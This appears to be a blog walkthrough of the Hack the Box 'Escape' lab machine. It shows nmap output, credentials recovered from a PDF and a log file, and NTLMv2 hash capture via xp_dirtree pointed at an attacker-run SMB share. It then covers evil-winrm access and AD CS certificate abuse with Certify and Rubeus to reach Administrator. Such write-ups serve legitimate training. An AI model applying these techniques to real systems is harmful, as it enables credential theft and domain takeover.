In this post, I would like to share a walkthrough of the Escape Machine from Hack the Box
This room will be considered a medium machine on Hack the Box
What will you gain from the Escape machine?
For the user flag, you will need to manage to obtain the database credentials inside the PDF file. We should get an NTLMv2 hash by using SQL command via smbserver. As a result, we success to access the server by using evil-winrm. Next, we should get other credentials from the error log file.
As for the root flag, you only need to retrieve the administrator’s NTLM hash by using the tools such as Rubeus.exe and Certifiy.exe
Information Gathering on Escape Machine
Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN
┌─[darknite@parrot]─[~/Document/htb/Escape]
└──╼ $nmap -sC -sV 10.10.11.202 -oA initial -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-03 02:17 EST
Nmap scan report for 10.10.11.202
Host is up (0.22s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-03-03 15:18:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-03-03T15:19:45+00:00; +8h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-03T15:19:46+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2023-03-03T15:19:45+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-03-03T13:51:43
|_Not valid after: 2053-03-03T13:51:43
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-03T15:19:45+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-03-03T15:19:46+00:00; +8h00m00s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.08 seconds
From the nmap result, I notice that there’s no HTTP or port 80 open on the machine
SMBclient enumeration
Let’s enumerate the SMB Shares on the machine and notice only the Public Sharename has caught my attention
Therefore, let’s access the Sharename by using the smbclient
However, we managed to find a PDF file that we can try to download the file on our attacker’s machine
Sadly, we cannot download normally because we got the error “NT_STATUS_NO_SUCH_FILE“
As a result, we can add the symbol ” on the SQL Server Procedures.pdf and we managed to download it successfully
The two screenshots above show some useful information
Enumerate the server by running the impacket-mssqlclient and impacket-smbserver
From the information that we found earlier within the PDF by starting the mssqlclient with the command “impacket-mssqlclient WORKGROUP/PublicUser:GuestCantWrite1@10.10.11.202“
Firstly, let’s start our smbserver by executing the command “sudo impacket-smbserver <anyname> . -smbsupport“
As a result, we should execute the xp_dirtree ‘\\<yourIP\<yourfile>‘
At last, we managed to obtain the hashes that we can crack with John the Ripper
The hashes will be looking something as shown above.
Finally, the hashes managed to be cracked with the username and password
Accessing the Escape machine via evil-winrm
We should be able to access the machine via evil-winrm by entering the credentials that we found earlier such as username = sql_server and password = REGGIE1234ronnie
Nothing can be found within the Document directory
We managed to find an SQL Server on the main directory there’s some useful information hidden in that SQL Server directory
There’s a backup file such as ERORLOG.BAK resides within the Logs Directory
There should be something that we can use for the latter stage.
After i analyze the logs carefully, i notice there is one credential that we can use to obtain access to the machine with a different username
Finally, we can access the machine via a different credential
We can read the user flag by using the “type user.txt” command
Escalate to Administrator Privileges Access
For this activity, we are required to have Certify.exe which can be downloaded here
We should upload the certify.exe into the victim’s machine
To ensure the binary work, we can test by executing it
We should be able to find any vulnerability by using the certify.exe command
We can request the certificate and the private key where all the data that has been passing is requested by using the vulnerable template
Later, we can execute openssl command where the certificate will be saved as cert.pem which leads to exporting of the cert.pfx
As a result, we can upload the cert.pfx on the victim’s machine
Also, we are required to upload Rubeus.exe on the victim’s machine
We should be getting NTLM hashes by running the Rubeus command
Boom! At last, we managed to access the machine as Administrator user
We can read the root flag by typing the “type root.txt” command
No responses yet